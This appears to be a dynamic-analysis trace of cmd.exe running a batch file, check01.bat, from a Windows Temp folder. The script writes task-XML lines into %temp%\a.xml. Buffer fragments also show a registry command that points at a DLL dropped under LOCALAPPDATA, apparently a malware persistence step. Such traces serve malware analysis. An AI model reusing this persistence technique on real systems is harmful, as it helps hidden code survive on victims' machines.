[0378.439] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.439] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ae
[0378.440] GetProcessHeap () returned 0x200000
[0378.440] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.440] GetProcessHeap () returned 0x200000
[0378.440] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.440] GetProcessHeap () returned 0x200000
[0378.440] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.440] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.440] GetProcessHeap () returned 0x200000
[0378.440] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.440] GetProcessHeap () returned 0x200000
[0378.441] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.441] GetProcessHeap () returned 0x200000
[0378.441] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.441] _tell (_FileHandle=3) returned 1966
[0378.442] _close (_FileHandle=3) returned 0
[0378.442] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.442] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.442] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.442] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.442] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.442] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.442] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.442] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.442] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.442] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.442] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.442] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.443] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.443] GetFileType (hFile=0x7) returned 0x2
[0378.443] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.443] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.444] _dup (_FileHandle=1) returned 3
[0378.445] _close (_FileHandle=1) returned 0
[0378.446] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.446] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.446] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.446] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.446] GetFileType (hFile=0x64) returned 0x1
[0378.446] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x379
[0378.446] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x378
[0378.447] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.447] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.447] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21f4a0, Size=0x30) returned 0x216db0
[0378.447] GetProcessHeap () returned 0x200000
[0378.447] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x216db0) returned 0x30
[0378.447] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 17
[0378.447] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.448] GetFileType (hFile=0x64) returned 0x1
[0378.448] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.448] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 18
[0378.448] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x11, lpOverlapped=0x0) returned 1
[0378.448] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.450] _close (_FileHandle=3) returned 0
[0378.451] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.451] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.452] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.452] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.455] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.455] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.456] SetConsoleInputExeNameW () returned 0x1
[0378.456] GetConsoleOutputCP () returned 0x1b5
[0378.457] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.457] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.457] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.457] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.457] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.457] SetFilePointer (in: hFile=0x64, lDistanceToMove=1966, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ae
[0378.458] GetProcessHeap () returned 0x200000
[0378.458] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x228690 | out: hHeap=0x200000) returned 1
[0378.458] GetProcessHeap () returned 0x200000
[0378.458] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216db0 | out: hHeap=0x200000) returned 1
[0378.458] GetProcessHeap () returned 0x200000
[0378.458] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.458] GetProcessHeap () returned 0x200000
[0378.458] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.458] GetProcessHeap () returned 0x200000
[0378.459] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0378.459] GetProcessHeap () returned 0x200000
[0378.459] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.459] GetProcessHeap () returned 0x200000
[0378.459] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.459] GetProcessHeap () returned 0x200000
[0378.459] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.459] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.459] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ae
[0378.459] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x784, lpOverlapped=0x0) returned 1
[0378.460] SetFilePointer (in: hFile=0x64, lDistanceToMove=2029, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ed
[0378.460] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^false^ >> %temp%\\a.xml\r\n", cbMultiByte=63, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^false^ >> %temp%\\a.xml\r\n >> %temp%\\a.xml\r\n\\a.xml\r\n^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 63
[0378.460] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.460] GetFileType (hFile=0x64) returned 0x1
[0378.460] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.460] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ed
[0378.460] GetProcessHeap () returned 0x200000
[0378.460] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.461] GetProcessHeap () returned 0x200000
[0378.461] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.461] GetProcessHeap () returned 0x200000
[0378.461] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.461] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.461] GetProcessHeap () returned 0x200000
[0378.461] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.461] GetProcessHeap () returned 0x200000
[0378.461] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.461] GetProcessHeap () returned 0x200000
[0378.462] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.462] _tell (_FileHandle=3) returned 2029
[0378.462] _close (_FileHandle=3) returned 0
[0378.462] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.462] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.462] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.462] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.463] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.463] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.463] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.463] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.463] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.463] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.463] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.463] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.463] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.463] GetFileType (hFile=0x7) returned 0x2
[0378.464] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.464] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.465] _dup (_FileHandle=1) returned 3
[0378.466] _close (_FileHandle=1) returned 0
[0378.466] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.467] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.467] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.467] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.467] GetFileType (hFile=0x64) returned 0x1
[0378.467] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x38a
[0378.467] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x389
[0378.467] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.467] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.468] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x220470, Size=0x60) returned 0x220470
[0378.468] GetProcessHeap () returned 0x200000
[0378.468] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x220470) returned 0x60
[0378.468] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="false \r\n") returned 39
[0378.468] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.468] GetFileType (hFile=0x64) returned 0x1
[0378.468] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.469] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="false \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="false \r\n", lpUsedDefaultChar=0x0) returned 40
[0378.469] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x27, lpOverlapped=0x0) returned 1
[0378.469] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.471] _close (_FileHandle=3) returned 0
[0378.472] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.472] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.472] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.472] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.473] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.473] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.474] SetConsoleInputExeNameW () returned 0x1
[0378.474] GetConsoleOutputCP () returned 0x1b5
[0378.474] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.474] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.475] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.475] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.475] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.475] SetFilePointer (in: hFile=0x64, lDistanceToMove=2029, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ed
[0378.475] GetProcessHeap () returned 0x200000
[0378.475] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2204e0 | out: hHeap=0x200000) returned 1
[0378.475] GetProcessHeap () returned 0x200000
[0378.476] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0378.476] GetProcessHeap () returned 0x200000
[0378.476] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.476] GetProcessHeap () returned 0x200000
[0378.476] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc60 | out: hHeap=0x200000) returned 1
[0378.476] GetProcessHeap () returned 0x200000
[0378.476] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.476] GetProcessHeap () returned 0x200000
[0378.476] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.476] GetProcessHeap () returned 0x200000
[0378.476] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.477] GetProcessHeap () returned 0x200000
[0378.477] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.477] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.477] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ed
[0378.477] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x745, lpOverlapped=0x0) returned 1
[0378.478] SetFilePointer (in: hFile=0x64, lDistanceToMove=2092, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82c
[0378.478] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^false^ >> %temp%\\a.xml\r\n", cbMultiByte=63, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^false^ >> %temp%\\a.xml\r\n >> %temp%\\a.xml\r\n\\a.xml\r\n^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 63
[0378.478] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.478] GetFileType (hFile=0x64) returned 0x1
[0378.478] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.478] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82c
[0378.478] GetProcessHeap () returned 0x200000
[0378.478] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.478] GetProcessHeap () returned 0x200000
[0378.478] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.479] GetProcessHeap () returned 0x200000
[0378.479] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.479] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.479] GetProcessHeap () returned 0x200000
[0378.479] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.479] GetProcessHeap () returned 0x200000
[0378.479] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.479] GetProcessHeap () returned 0x200000
[0378.480] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.480] _tell (_FileHandle=3) returned 2092
[0378.480] _close (_FileHandle=3) returned 0
[0378.480] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.480] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.480] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.481] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.481] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.481] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.481] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.481] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.481] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.481] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.481] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.481] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.481] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.481] GetFileType (hFile=0x7) returned 0x2
[0378.482] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.482] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.483] _dup (_FileHandle=1) returned 3
[0378.484] _close (_FileHandle=1) returned 0
[0378.485] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.485] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.485] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.485] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.485] GetFileType (hFile=0x64) returned 0x1
[0378.485] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3b1
[0378.485] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x3b0
[0378.485] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.486] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.486] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x220470, Size=0x60) returned 0x220470
[0378.486] GetProcessHeap () returned 0x200000
[0378.486] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x220470) returned 0x60
[0378.486] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="false \r\n") returned 39
[0378.486] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.486] GetFileType (hFile=0x64) returned 0x1
[0378.487] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.487] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="false \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="false \r\n", lpUsedDefaultChar=0x0) returned 40
[0378.487] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x27, lpOverlapped=0x0) returned 1
[0378.487] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.489] _close (_FileHandle=3) returned 0
[0378.490] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.490] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.490] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.490] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.491] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.491] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.492] SetConsoleInputExeNameW () returned 0x1
[0378.492] GetConsoleOutputCP () returned 0x1b5
[0378.492] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.492] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.493] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.493] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.493] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.493] SetFilePointer (in: hFile=0x64, lDistanceToMove=2092, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82c
[0378.493] GetProcessHeap () returned 0x200000
[0378.494] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2204e0 | out: hHeap=0x200000) returned 1
[0378.494] GetProcessHeap () returned 0x200000
[0378.494] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0378.494] GetProcessHeap () returned 0x200000
[0378.494] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.494] GetProcessHeap () returned 0x200000
[0378.494] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc60 | out: hHeap=0x200000) returned 1
[0378.494] GetProcessHeap () returned 0x200000
[0378.495] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.495] GetProcessHeap () returned 0x200000
[0378.495] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.495] GetProcessHeap () returned 0x200000
[0378.495] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.495] GetProcessHeap () returned 0x200000
[0378.495] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.495] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.496] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82c
[0378.496] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x706, lpOverlapped=0x0) returned 1
[0378.515] SetFilePointer (in: hFile=0x64, lDistanceToMove=2132, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x854
[0378.515] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=40, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\ndle^> >> %temp%\\a.xml\r\n >> %temp%\\a.xml\r\n\\a.xml\r\n^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 40
[0378.516] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.516] GetFileType (hFile=0x64) returned 0x1
[0378.516] _get_osfhandle (_FileHandle=3) returned 0x64
